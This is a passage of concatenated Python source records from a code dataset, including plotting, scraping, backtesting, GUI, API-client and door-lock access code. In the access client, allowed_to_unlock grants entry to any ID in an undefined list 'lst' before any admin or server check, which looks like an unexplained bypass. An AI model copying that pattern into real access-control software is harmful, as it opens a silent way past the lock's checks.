pl.ylabel('Precision')\r\n pl.show()\r\n return precision\r\ndef calculate_success(positions,ground_truth,title,show=True):\r\n success = np.zeros((50,1))\r\n overlap = calculate_overlap(positions,ground_truth)\r\n for n in xrange(50):\r\n p = 1.0/50*n\r\n success[n] = np.size(np.nonzero(overlap>=p))*1.0/np.size(success)\r\n if show == True:\r\n t = np.arange(0,1,0.02)\r\n pl.plot(t,success,'r')\r\n pl.title(title)\r\n pl.xlabel('Threshold')\r\n pl.ylabel('Success')\r\n pl.show()","sub_path":"evaluate_method.py","file_name":"evaluate_method.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"259426057","text":"import unittest\n\ndef solve(arr):\n\tif arr is None:\n\t\treturn arr\n\tbest = 0\n\tcount = 0\n\tfor elm in arr:\n\t\tcount += elm\n\t\tif count < 0:\n\t\t\tcount = 0\n\t\tbest = max(best, count)\n\treturn best\n\nclass 
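# calculate_overlap in the evaluate_method.py record above is intersection-
# over-union for (left, bottom, width, height) boxes. The same arithmetic for
# two single boxes, which makes the invariants easy to check (sketch only):
def iou(a, b):
    ax2, ay2 = a[0] + a[2] - 1, a[1] + a[3] - 1
    bx2, by2 = b[0] + b[2] - 1, b[1] + b[3] - 1
    iw = max(0, min(ax2, bx2) - max(a[0], b[0]) + 1)  # intersection width
    ih = max(0, min(ay2, by2) - max(a[1], b[1]) + 1)  # intersection height
    inter = iw * ih
    return inter / float(a[2] * a[3] + b[2] * b[3] - inter)

assert iou((0, 0, 10, 10), (0, 0, 10, 10)) == 1.0     # identical boxes
assert iou((0, 0, 10, 10), (100, 100, 10, 10)) == 0.0  # disjoint boxes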
Test(unittest.TestCase):\n\t\n\tdata = [([34,-50,42,14,-5,86], 137),\n\t\t\t([-5,-1,-8,-9], 0)]\n\n\tdef test(self):\n\t\tfor case, expected in self.data:\n\t\t\tactual = solve(case)\n\t\t\tself.assertEqual(actual, expected)\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"Problem_49/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"341417897","text":"#!/usr/local/bin/python3\n\nfile = open(\"countries.txt\", \"r\")\n\ncountries=[]\n\nfor line in file:\n line = line.strip()\n countries.append(line)\n\nfile.close()\n\nprint(len(countries))\n\n#Loop through list and print countries that start with \"U\"\nfor country in countries:\n if country[0] == \"U\":\n print(country)\n","sub_path":"fileread.py","file_name":"fileread.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"411996939","text":"import requests as rq\r\nfrom bs4 import BeautifulSoup as BS\r\n\r\n\r\ndef split_num(num: int) -> str:\r\n num = str(num)\r\n for ind in range(len(num), 0, -3):\r\n if ind != len(num):\r\n num = num[:ind] + \" \" + num[ind:]\r\n return num\r\n\r\n\r\n\r\ndef get_data() -> dict:\r\n url = \"https://www.worldometers.info/coronavirus/\"\r\n html = rq.get(url).text\r\n soup = BS(html, \"html.parser\")\r\n\r\n db = {}\r\n\r\n for el in soup.select(\".main_table_countries_div > .table-bordered > tbody\")[:2]:\r\n for unit in el.select(\"tr\"):\r\n data = []\r\n for s in unit.find_all(\"td\"):\r\n n = s.get_text().strip().replace(\",\", \"\").replace(\"+\", \"\")\r\n if n in [\"\", \"N/A\"]:\r\n n = \"-\"\r\n data += [n]\r\n data = data[1:15]\r\n # country, population, total_cases, active_cases, total_recovered, total_death, new_cases, new_recovered, new_deaths\r\n if data[0] != None:\r\n if not(data[0].isdigit()) and data[0].strip() != \"Total:\":\r\n db[data[0].lower()] = {\r\n \"country\": data[0],\r\n \"population\": split_num(data[13]),\r\n \"total_case\": split_num(data[1]),\r\n \"active_case\": split_num(data[7]),\r\n \"total_recover\": split_num(data[5]),\r\n \"total_death\": split_num(data[3]),\r\n \"new_case\": split_num(data[2]),\r\n \"new_recover\": split_num(data[6]),\r\n \"new_death\": split_num(data[4]),\r\n }\r\n return db\r\n","sub_path":"src/utils/webparser.py","file_name":"webparser.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"320638573","text":"import pylab\nimport os\nfrom pkg_resources import resource_filename\n\n\ndef plot(name: str, capacity: float) -> None:\n times = []\n values = []\n results_dir = resource_filename('membrane_capacity_test', 'results')\n for result_file in os.listdir(os.path.join(results_dir, 'raw_data')):\n if name in result_file:\n with open(os.path.join(results_dir, 'raw_data', result_file)) as data:\n for line in data:\n time, value = line.split()\n times.append(time)\n values.append(value)\n pylab.plot(times, values, label='{} pF'.format(capacity))\n\ndef save(name: str) -> None:\n pylab.ylabel('Membrane potential, mV')\n pylab.xlabel('time, ms')\n pylab.title('Comparison of three neurons with different membrane capacity', fontsize=12)\n pylab.legend()\n results_dir = resource_filename('membrane_capacity_test', 'results')\n pylab.savefig(os.path.join(results_dir, 'img', 
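# split_num in the webparser.py record above inserts a space every three
# digits, scanning right to left. Its behaviour matches the standard "," format
# spec with the comma swapped for a space (sketch; split_num copied from above):
def split_num(num):
    num = str(num)
    for ind in range(len(num), 0, -3):
        if ind != len(num):
            num = num[:ind] + " " + num[ind:]
    return num

assert split_num(1234567) == "1 234 567"
assert split_num(1234567) == "{:,}".format(1234567).replace(",", " ")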
'{}.png'.format(name)))\n","sub_path":"un/lab/nest_practice/membrane_capacity_test/src/tools/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"417896154","text":"# class Solution:\n# def letterCasePermutation(self, S: str) -> List[str]:\n# f = lambda x: (x.lower(), x.upper()) if x.isalpha() else x\n# return map(\"\".join, itertools.product(*map(f,S)))\nclass Solution:\n def letterCasePermutation(self, S: str) -> List[str]:\n res=['']\n for x in S:\n if x.isalpha():\n res = [i+x for i in res] + [i+x.swapcase() for i in res]\n else:\n res = [i+x for i in res]\n return res","sub_path":"位运算/784. 字母大小写全排列/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"314136160","text":"import torch\nimport numpy as np\nfrom PIL import Image, ImageFilter\nimport os\nimport matplotlib.pyplot as plt\nimport torch.utils.data as data\nfrom torchvision.datasets import ImageNet\nfrom torchvision.transforms import RandomCrop, RandomRotation, RandomHorizontalFlip, RandomVerticalFlip, Compose, ToPILImage, CenterCrop, Normalize, Grayscale, Resize\nfrom tqdm import tqdm\n\nclass Dataset(data.Dataset):\n def __init__(self, settings, validation=None, mode=None):\n # dataset = settings['general']['dataset']\n dataset = settings\n self.size = 0\n if dataset == 'imageNET':\n self.images = 'data/imageNET' \n #self.labels = pathtolabels\n self.size = 1\n \n elif dataset == 'YFCC100M':\n self.images = 'data/YFCC100M'\n # self.labels = pathtolabels \n #self.size = len(self.images)\n \n def __getitem__(self, index):\n idx = np.random.randint(0,self.size)\n img_batch = np.load(f'{self.images}/train_data_batch_1', allow_pickle = True)\n return img_batch['data'][idx]\n #return ImageNet(self.images).loader('train_data_batch_1')\n \n def __len__(self):\n return self.size\n \ndef load_data(settings, transformation=None, n_train=None, n_test=None):\n ds = Dataset(settings)\n try:\n dataloader = torch.utils.data.DataLoader(\n ds,\n shuffle=True,\n batch_size = 1\n )\n dl = dataloader\n for items in tqdm(dl):\n plt.imshow(items)\n \n except UnboundLocalError:\n print('error')\n \n \nif __name__ == \"__main__\":\n \n load_data('imageNET')\n","sub_path":"utils/load_data2.py","file_name":"load_data2.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"285053947","text":"\nhashtable = __import__('8_hashtables', fromlist=['HashTable'])\nHashTable = hashtable.HashTable\n\n\nclass Set(object):\n\n def __init__(self, elements=None):\n \"\"\"Initialize this new empty set structure with the given initial size.\"\"\"\n self.map = HashTable()\n self.size = 0 # property that tracks the number of elements in constant time\n if elements is not None:\n for element in elements:\n self.size += 1 \n self.map.set(element, True)\n \n def contains(self, element):\n \"\"\"return a boolean indicating whether element is in this set.\"\"\"\n # return element in self.elements -> return self.elements.___contains__(element)\n return self.map.contains(element)\n\n def add(self, element):\n \"\"\"add element to this set, if not present already\"\"\"\n # check if its unique by \n # if not self.contains(element):\n if self.map.contains(element) == False:\n self.map.set(element, None)\n self.size += 1\n return 
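# letterCasePermutation in the Solution.py record above doubles the partial
# result list at every alphabetic character, so k letters yield 2**k strings.
# A standalone spelling of the same loop with a quick check (sketch only):
def letter_case_permutation(s):
    res = ['']
    for ch in s:
        if ch.isalpha():
            res = [p + ch for p in res] + [p + ch.swapcase() for p in res]
        else:
            res = [p + ch for p in res]  # digits etc. extend every prefix once
    return res

assert sorted(letter_case_permutation("a1b")) == ["A1B", "A1b", "a1B", "a1b"]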
self.size\n\n def remove(self, element):\n \"\"\"remove element from this set, if present, or else raise KeyError\"\"\"\n # if element in self.elements:\n # if self.elements.__contains__(element):\n # if self.contains(element):\n self.map.delete(element)\n self.size -= 1\n return self.size\n # else:\n # raise KeyError('Element not found: {}'.format(element))\n \n def union(self, other_set):\n \"\"\"return a new set that is the union of this set and other_set\"\"\"\n new_set = Set()\n # for element in self.map:\n # for element in self.elements.__iter__():\n for element in self.map.keys():\n new_set.add(element) # or new_set.add(element.data[0]) ?\n\n for element in other_set.map.keys():\n if not new_set.contains(element):\n new_set.add(element)\n\n return new_set\n \n def intersection(self, other_set):\n \"\"\"return a new set that is the intersection of this set and other_set\"\"\"\n new_set = Set()\n for element in other_set.map.keys():\n if self.contains(element):\n new_set.add(element)\n\n return new_set\n\n def difference(self, other_set):\n \"\"\"return a new set that is the difference of this set and other_set\"\"\"\n new_set = Set()\n for element in self.map.keys():\n if not other_set.contains(element):\n new_set.add(element)\n\n return new_set\n \n def issubset(self, other_set):\n \"\"\"Return true if all the elements in a set exist in the other set, False if not.\"\"\"\n for item in self.map.keys():\n if item not in other_set.map.keys():\n return False\n return True","sub_path":"Refactored-Code/10_set.py","file_name":"10_set.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"425215984","text":"from urllib.request import urlopen\nfrom urllib.error import URLError\nfrom urllib.error import HTTPError \nimport json\nimport pprint\nimport pytest\n\n\n\ndef InputVkIds():\n print('Enter a list of ids, separated by commas:')\n id = input()\n return id\n\ndef SendRequestVk(ids,url):\n request = url.format(id = ids)\n print('Built request:', request)\n obj={} \n try:\n request_obj = urlopen(request)# send the request to the server\n obj = json.loads(request_obj.read())# convert the server response to JSON\n except HTTPError:\n raise \n except URLError:\n raise \n return obj\n\ndef JsonConsoleWriter(json):\n if (json.get('response') != None and json.get('response')!=\"error\"):# double JSON check 1: for the case when the server handled the request but returned an error JSON without a response field 2: for the case when the server returned nothing at all, i.e. the except branch \n print('Server response:')\n resp=json.get('response')# store the value of the response field in a variable\n for field in resp:\n print(' ' + '_'*70 + '\\n')\n print(\" First name: \" + str(field['first_name']))\n print(\" Last name: \" + str(field['last_name']))\n print(\" Nickname: \" + str(field['nickname']))\n print(\" Status: \" + str(field['status']))\n print(\" Online: \" + str(field['online']))\n print(\" Sex: \" + str(field['sex']))\n print(\" Last_seen: \" + str(field['last_seen'])+ '\\n')\n print(' ' + '_'*70 + '\\n') \n else:\n if (json.get('response') != None):\n \t if (json.get('error') != None):\n \t \tprint('The server returned an error:')\n \t \tpprint.pprint(json['error'])\n \t else:\n \t \tprint('Unknown error!');\n else:\n \t resp=json.get('response')\n \t print(resp)\n \n 
\n#JsonConsoleWriter(SendRequestVk(InputVkIds(),\"https://api.vk.com/method/users.get?user_ids={id}&fields=nickname,sex,city,site,first_name,last_name,status,online,last_seen&v=5.69\"))\nclass TestList:\n\n def test_type_error(self):\n with pytest.raises(URLError):\n SendRequestVk(\"id150534032\",\"https://jjr.jjr.jjr/method/users.get?user_ids={id}&fields=nickname,sex,city,site,first_name,last_name,status,online,last_seen&v=5.69\")\n def test_check1(self):\n aa=SendRequestVk(\"id150534032\",\"https://api.vk.com/method/users.get?user_ids={id}&fields=nickname,sex,city,site,first_name,last_name,status,online,last_seen&v=5.69\")\n assert (aa.get('response') != None)\n def test_check2(self):\n aa=SendRequestVk(\"asdasfdfdas\",\"https://api.vk.com/method/users.get?user_ids={id}&fields=nickname,sex,city,site,first_name,last_name,status,online,last_seen&v=5.69\")\n assert (aa.get('error') != None) \n \n\n \n","sub_path":"urllib.py","file_name":"urllib.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"246470582","text":"import unittest\n###############################################################################\n# This has to be tested through a workspace as it cannot be created in \n# Python\n###############################################################################\nfrom testhelpers import run_algorithm\nfrom mantid.geometry import Instrument\nfrom mantid.api import Sample, Run\n\nclass ExperimentInfoTest(unittest.TestCase):\n \n _expt_ws = None\n \n def setUp(self):\n if self.__class__._expt_ws is None:\n alg = run_algorithm('Load', Filename='LOQ48127.raw', SpectrumMax=1, child=True)\n self.__class__._expt_ws = alg.getProperty(\"OutputWorkspace\").value\n \n def test_information_access(self):\n inst = self._expt_ws.getInstrument()\n self.assertTrue(isinstance(inst, Instrument))\n self.assertEqual(self._expt_ws.getRunNumber(), 48127)\n \n def test_sample_access_returns_sample_object(self):\n sample = self._expt_ws.sample()\n self.assertTrue(isinstance(sample, Sample))\n \n def test_run_access_returns_run_object(self):\n run = self._expt_ws.run()\n self.assertTrue(isinstance(run, Run))","sub_path":"Code/Mantid/Framework/PythonInterface/test/python/mantid/api/ExperimentInfoTest.py","file_name":"ExperimentInfoTest.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}{"seq_id":"409348101","text":"###############################################################################\n#### Backtest\n###############################################################################\nimport pandas as pd\nimport numpy as np\nimport datetime\nfrom pytrade.io import adj_close_ipc\n\ndef pf_backtest(numdays, pf,start):\n ## Backtesting\n yday = datetime.datetime.today()-datetime.timedelta(days=1)\n base = yday-datetime.timedelta(days=numdays)\n\n test_dates = pd.bdate_range(base,yday)\n test_end = max(test_dates)\n test_start = min(test_dates)\n\n test_data = adj_close_ipc(start,test_end)\n\n\n rets = []\n metrics = []\n\n #test_dates = [d+datetime.timedelta(days=1) for d in test_dates]\n\n for date in test_dates:\n test = test_data[start:date-datetime.timedelta(days=1)]\n val = test_data[date:date]\n portfolio, mt = pf(test)\n\n metrics.append(mt)\n\n ret = 0.0\n\n for row in portfolio:\n try:\n previous_close = test[row[0]].tail()[-1]\n current_close = val[row[0]][0]\n temp = row[1]*np.log(current_close/previous_close)\n if 
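# JsonConsoleWriter in the urllib.py record above distinguishes three reply
# shapes: a usable "response", an "error" object, and anything else. The same
# triage isolated into a pure function (names invented for this sketch):
def classify_vk_reply(payload):
    if payload.get('response') is not None:
        return 'ok', payload['response']
    if payload.get('error') is not None:
        return 'server-error', payload['error']
    return 'unknown-error', None

assert classify_vk_reply({'response': [1]})[0] == 'ok'
assert classify_vk_reply({'error': {'error_code': 5}})[0] == 'server-error'
assert classify_vk_reply({})[0] == 'unknown-error'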
np.isnan(temp):\n #print \"NaN here: \", row\n ret += 0.0\n else:\n ret += temp\n except:\n pass\n\n rets.append(ret)\n\n # Ba\n bt = test_data[test_start:test_end]\n market_rets = np.nansum(np.log(bt.values/bt.shift(1).values), axis = 1)\n\n\n test_dates = [pd.Timestamp(x) for x in test_dates]\n df = pd.DataFrame(index=test_dates)\n df['Strategy'] = rets\n df['Market'] = market_rets\n df['Portfolio Return'] = [m[0] for m in metrics]\n df['Portfolio Volatility'] = [m[1] for m in metrics]\n df['Sharpe Ratio'] = [m[2] for m in metrics]\n return df\n","sub_path":"pytrade/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"538973449","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\lib\\GridEditor.py\n# Compiled at: 2019-04-19 01:10:52\nimport wx, wx.xrc, wx.grid as gridlib, wx.dataview, copy\n\nclass TableGrid(gridlib.Grid):\n\n def __init__(self, parent, log):\n gridlib.Grid.__init__(self, parent, -1)\n self.table = DataTable(log)\n self.SetTable(self.table, True)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Bind(gridlib.EVT_GRID_CELL_LEFT_DCLICK, self.OnLeftDClick)\n self.Bind(gridlib.EVT_GRID_CELL_LEFT_CLICK, self.OnLeftClick)\n self.SetColSize(0, 200)\n self.SetColSize(1, 100)\n self.SetColSize(2, 300)\n self.SetColSize(3, 100)\n self.selRow = 0\n self.selCol = 0\n self.log = log\n\n def OnLeftDClick(self, evt):\n if self.CanEnableCellControl():\n self.EnableCellEditControl()\n evt.Skip()\n\n def OnLeftClick(self, evt):\n self.selRow = evt.GetRow()\n self.selCol = evt.GetCol()\n evt.Skip()\n\n def SetChoice(self, col, lt):\n self.table.SetChoice(col, lt)\n\n def DelRow(self):\n self.table.DeleteRows(self.selRow, 1)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n return self.selRow\n\n def DelAll(self):\n self.table.DeleteAll()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def AddRow(self):\n self.table.AppendRows(1)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def AddRows(self, numRows):\n self.table.AppendRows(numRows)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def InsertRow(self, pos):\n self.table.InsertRows(pos, 1)\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def Refresh(self):\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n\n def Render(self, data):\n self.DelAll()\n self.AddRows(len(data))\n for i in range(0, len(data)):\n for j in range(0, len(data[i])):\n self.table.SetValue(i, j, data[i][j])\n\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n self.AutoSizeColumns(False)\n self.Update()\n self.SetRowLabelSize(0)\n self.SetMargins(0, 0)\n 
self.AutoSizeColumns(False)\n\n\nclass DataTable(gridlib.GridTableBase):\n\n def __init__(self, log):\n gridlib.GridTableBase.__init__(self)\n self.log = log\n self.colLabels = [\n 'Name', 'Datatype', 'Comment', 'Init Value']\n self.dataTypes = [\n gridlib.GRID_VALUE_STRING,\n gridlib.GRID_VALUE_STRING,\n gridlib.GRID_VALUE_STRING,\n gridlib.GRID_VALUE_STRING]\n self.data = []\n self.itemdata = []\n self.defaultdata = [\n '', '', '', '']\n\n def GetNumberRows(self):\n return len(self.data)\n\n def GetNumberCols(self):\n return len(self.colLabels)\n\n def IsEmptyCell(self, row, col):\n try:\n return not self.data[row][col]\n except IndexError:\n return True\n\n def GetValue(self, row, col):\n try:\n return self.data[row][col]\n except IndexError:\n return ''\n\n def GetItemValue(self, row, col):\n try:\n return self.itemdata[row][col]\n except IndexError:\n return\n\n return\n\n def SetValue(self, row, col, value):\n\n def innerSetValue(row, col, value):\n try:\n self.data[row][col] = value\n except IndexError:\n self.data.append([''] * self.GetNumberCols())\n innerSetValue(row, col, value)\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_APPENDED, 1)\n self.GetView().ProcessTableMessage(msg)\n\n innerSetValue(row, col, value)\n\n def SetItemValue(self, row, col, value):\n\n def innerSetItemValue(row, col, value):\n try:\n self.itemdata[row][col] = value\n except IndexError:\n self.data.append([''] * self.GetNumberCols())\n innerSetItemValue(row, col, value)\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_APPENDED, 1)\n self.GetView().ProcessTableMessage(msg)\n\n innerSetItemValue(row, col, value)\n\n def SetChoice(self, col, lt):\n self.dataTypes[col] = gridlib.GRID_VALUE_CHOICE + ':' + (',').join(lt)\n\n def GetColLabelValue(self, col):\n return self.colLabels[col]\n\n def GetTypeName(self, row, col):\n return self.dataTypes[col]\n\n def CanGetValueAs(self, row, col, typeName):\n colType = self.dataTypes[col].split(':')[0]\n if typeName == colType:\n return True\n else:\n return False\n\n def CanSetValueAs(self, row, col, typeName):\n return self.CanGetValueAs(row, col, typeName)\n\n def DeleteRows(self, pos=0, numRows=1):\n if pos > len(self.data) and pos < 0:\n return\n for i in range(0, numRows):\n del self.data[pos + i]\n del self.itemdata[pos + i]\n\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_DELETED, pos, numRows)\n self.GetView().ProcessTableMessage(msg)\n\n def DeleteAll(self):\n nn = self.GetNumberRows()\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_DELETED, 0, self.GetNumberRows())\n self.GetView().ProcessTableMessage(msg)\n self.data = []\n self.itemdata = []\n\n def AppendRows(self, numRows=1):\n for i in range(0, numRows):\n dd = copy.deepcopy(self.defaultdata)\n self.data.append(dd)\n dd2 = [None] * len(self.defaultdata)\n self.itemdata.append(dd2)\n\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_APPENDED, numRows)\n self.GetView().ProcessTableMessage(msg)\n return\n\n def InsertRows(self, pos, numRows=1):\n for i in range(0, numRows):\n dd = copy.deepcopy(self.defaultdata)\n self.data.insert(pos, dd)\n dd2 = [None] * len(self.defaultdata)\n self.itemdata.append(dd2)\n\n msg = gridlib.GridTableMessage(self, gridlib.GRIDTABLE_NOTIFY_ROWS_INSERTED, pos, numRows)\n self.GetView().ProcessTableMessage(msg)\n 
return","sub_path":"pycfiles/PLC_IDE-0.0.2-py2.7/GridEditor.py","file_name":"GridEditor.py","file_ext":"py","file_size_in_byte":7322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"209446188","text":"import requests\nimport json, string, datetime\nimport sys\nimport lcd_lib\nimport time\nfrom threading import Thread\nfrom http_lib import *\nfrom subprocess import check_output\nfrom log_writing import*\nconfig = {}\n\ndef get_ip():\n\treturn check_output(['hostname', '--all-ip-addresses'])\n\ndef configure(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = json.load(f)\n\t\tif (data.get(u'url_unlock') == None) or (data.get(u'url_upd') == None) :\n\t\t\traise Exception('Invalid content of config file')\n\texcept:\n\t\tlcd_lib.print_lcd('Configuration error')\n\t\tprint_log(\"Error processing config file: \" + str(sys.exc_info()))\n\t\tprint_log(\"Continuing working in an old way\")\n\telse:\n\t\tglobal config\n\t\tconfig = data\n\t\tlcd_lib.print_lcd('Configured')\n\t\tprint_log(\"New configuration: \" + str(config)) \n\ndef allowed_by_server(uid):\n\ttry:\n\t\tglobal config, ser1, ser2, ser3\n\t\turl = config[u'url_unlock'] + uid\n\t\tr = requests.get(url)\n\t\tprint_log('Unlock request:' + str(url))\n\t\tprint_log('response status code: ' + str(r.status_code))\n\t\tprint_log(r.text)\n\n\t\tif r.status_code != 200:\n\t\t\traise Exception('Server error')\n\t\tif (r.text == 'yes'):\n\t\t\treturn (True, \"not_defined\")\n\t\tif (r.text == \"no\") :\n\t\t\treturn (False, \"not_defined\")\n\n\t\tresp = json.loads(r.text)\n\t\tprint_log(\"name: \" + resp[\"name\"])\n\t\tif resp[\"status\"] == \"yes\":\n\t\t\treturn (True, resp[\"cause\"])\n\t\telse:\n\t\t\treturn (False, resp[\"cause\"])\n\n\texcept:\n\t\tlcd_lib.print_lcd('Network error')\n\t\tprint_log(\"Error asking server to unlock: \" + str(sys.exc_info()))\n\t\tprint_log(\"Continuing working\")\n\treturn (False, \"error\")\n\ndef allowed_by_list(uid):\n\tprint_log(\"Asking list\")\n\ttry:\n\t\twith open('access_list.txt') as f:\n\t\t\tdata = json.load(f, object_hook=date_hook)\n\n\t\tfor o in data:\n\t\t\tif (o['uid'] == uid)\\\n\t\t\tand (o['date_start'].date() == datetime.date.today())\\\n\t\t\tand (o['time_start'].time() <= datetime.datetime.now().time())\\\n\t\t\tand (o['time_end'].time() >= datetime.datetime.now().time()):\n\t\t\t\tprint_log(\"access granted\")\n\t\t\t\tprint_log(\"name: \" + o[\"name\"])\n\t\t\t\treturn True\n\texcept:\n\t\tlcd_lib.print_lcd('Database error')\n\t\tprint_log(\"Error processing access list: \" + str(sys.exc_info()))\n\t\tupdate_list()\n\tprint_log(\"no access\")\n\treturn False\n\ndef allowed_by_admin(uid):\n\ttry:\n\t\twith open('admin_uid.txt', 'rb') as f:\n\t\t\tfor line in f:\n\t\t\t\tif uid == line[:-1]:\n\t\t\t\t\tprint_log(\"Welcome, Admin Adminovich\")\n\t\t\t\t\treturn True\n\texcept:\n\t\tlcd_lib.print_lcd('Local error')\n\t\tprint_log(\"Error processing admin list\" + str( sys.exc_info()))\n\treturn False\n\ndef read_one_time_set():\n\tprint_log(\"reading one time set\")\n\ttry:\n\t\tf = open(\"one_time_set\", \"rb\")\n\t\tres = set(json.load(f))\n\t\tf.close()\n\t\tprint_log(\"reading ok\")\n\t\treturn res\n\texcept:\n\t\tprint_log(\"one time set reading falure \" + str(sys.exc_info()))\n\t\treturn set()\n\ndef write_one_time_set(set):\n\tprint_log(\"writing one time set\")\n\ttry:\n\t\tf = open(\"one_time_set\", \"wb\")\n\t\tjson.dump(list(set), f)\n\t\tprint_log(\"writing ok\")\n\texcept:\n\t\tprint_log(\"writing failed 
\" + str(sys.exc_info()))\n\n\ndef allowed_to_unlock(uid):\n\tif uid in lst: return (True, \"because\")\n\tif allowed_by_admin(uid):\n\t\treturn (True, \"admin\")\n\n\tone_time_set = read_one_time_set()\n\n\tif allowed_by_list(uid):\n\t\tif not uid in one_time_set:\n\t\t\tone_time_set.add(uid)\n\t\t\twrite_one_time_set(one_time_set)\n\t\treturn (True, \"list\")\n\n\tstatus, cause = allowed_by_server(uid)\n\tif status:\n\t\tif not uid in one_time_set:\n\t\t\tone_time_set.add(uid)\n\t\t\twrite_one_time_set(one_time_set)\n\t\treturn (True, cause)\n\n\tif uid in one_time_set:\n\t\tone_time_set.remove(uid)\n\t\twrite_one_time_set(one_time_set)\n\t\treturn (True, \"last_time\")\n\n\treturn (False, cause)\n\ndef date_hook(json_dict):\n\tfor (key, value) in json_dict.items():\n\t\ttry:\n\t\t\tjson_dict[key] = datetime.datetime.strptime(value, \"%Y-%m-%d\")\n\t\texcept:\n\t\t\tpass\n\t\ttry:\n\t\t\tjson_dict[key] = datetime.datetime.strptime(value, \"%H:%M\")\n\t\texcept:\n\t\t\tpass\n\treturn json_dict\n\ndef update_list():\n\ttry:\n\t\tglobal config\n\t\turl = config[u'url_upd']\n\t\tr = requests.get(url)\n\t\tprint_log('Update request:' + url)\n\t\tprint_log('response status code: ' + str(r.status_code))\n\t\tif r.status_code != 200:\n\t\t\traise Exception('Server error')\n\t\tjson_str = string.replace(r.text, \"'\", '\"')\n\t\twith open('access_list.txt', 'w') as f:\n\t\t\tf.write(json_str)\n\t\tprint_log(\"Access list successfully updated\")\n\t\tdata = json.loads(json_str, object_hook=date_hook)\n\t\treturn data\n\texcept:\n\t\tlcd_lib.print_lcd('Network error')\n\t\tprint_log(\"Error asking server to update: \" + str(sys.exc_info()))\n\t\tprint_log(\"Continuing working\")\n\treturn None\n\n\nclass update_thread(Thread):\n\tdef __init__(self):\n\t\tThread.__init__(self)\n\t\tself.name = \"list update thread\"\n\n\tdef run(self):\n\t\tconfigure(\"config.txt\")\n\t\twhile 1:\n\t\t\tprint_log(\">->->->->LIST UPDATE EVENT<-<-<-<-<\")\n\t\t\tupdate_list()\n\t\t\tprint_log(\"<-<-<-<-->->->->\\n\")\n\t\t\ttime.sleep(15 * 60)\n\nupdate_thr = update_thread()\n\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"212518493","text":"import argparse\nfrom pathlib import Path\nfrom PIL import Image\nimport tensorflow as tf\nimport io\nimport numpy as np\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--data\",\n default=None,\n type=str,\n required=True,\n help=\"The input data dir. 
